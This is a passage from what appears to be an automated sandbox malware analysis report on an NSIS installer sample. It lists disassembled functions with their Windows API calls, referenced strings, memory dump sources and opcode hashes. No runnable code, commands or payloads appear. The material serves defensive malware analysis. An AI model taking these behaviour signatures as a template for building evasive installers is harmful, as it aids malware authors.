                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                    • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                    Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                    • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                    • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                                    Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00055C00,00000064,00117D56), ref: 00403295
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                    • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                    Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                    • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                    • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                    • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                    Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(0069E0D0), ref: 00402387
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                                                                                                                                                    • API String ID: 1459762280-1711415406
                                                                                                                                                                                                                                                                                                    • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                                    Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                    • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                    Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(0069E0D0), ref: 00402387
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                    • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                    Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                    Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                    Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                    Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
